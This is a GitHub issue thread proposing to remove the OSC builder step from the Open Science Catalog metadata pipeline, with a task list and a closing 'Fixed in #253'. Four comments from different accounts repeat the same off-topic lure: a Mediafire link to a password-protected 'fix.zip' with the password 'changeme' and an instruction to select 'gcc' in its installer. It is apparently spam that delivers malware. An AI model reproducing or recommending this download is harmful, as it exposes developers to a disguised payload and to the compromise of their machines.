### ISSUE TITLE
Remove OSC builder step

### ISSUE THREAD

**Issue by constantinius** [ESA-EarthCODE/open-science-catalog-metadata#235]
Extract of this [issue](https://github.com/ESA-EarthCODE/open-science-catalog-metadata/issues/232#issuecomment-2273164707)

> removing the additional step of OSC builder: since it is accepted that STAC Browser is the main catalog rendering and search is currently done on the client, it is possible to remove the builder step and directly ingest the "source of truth" catalog into the dynamic catalog (with dedicated validation workflow). This makes the entire process easier to understand for external users and removes one of the "moving parts"

Steps to do:
- Make sure that the metadata repository uses absolute links (TODO: determine which base URL to use, assuming: https://esa-earthcode.github.io/open-science-catalog-metadata/ for now)
- Make sure that cross links are properly applied (what the builder did earlier). The relevant part of the builder is found [here](https://github.com/EOEPCA/open-science-catalog-builder/blob/main/osc_builder/build.py#L278)
- Make sure that the relevant keywords are also applied (relevant code is [here](https://github.com/EOEPCA/open-science-catalog-builder/blob/main/osc_builder/build.py#L382))
- Remove the builder from the CI files [here](https://github.com/ESA-EarthCODE/open-science-catalog-metadata/blob/main/.github/workflows/build.yaml#L39-L46)

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by silvester-pari** [comment]
Fixed in #253
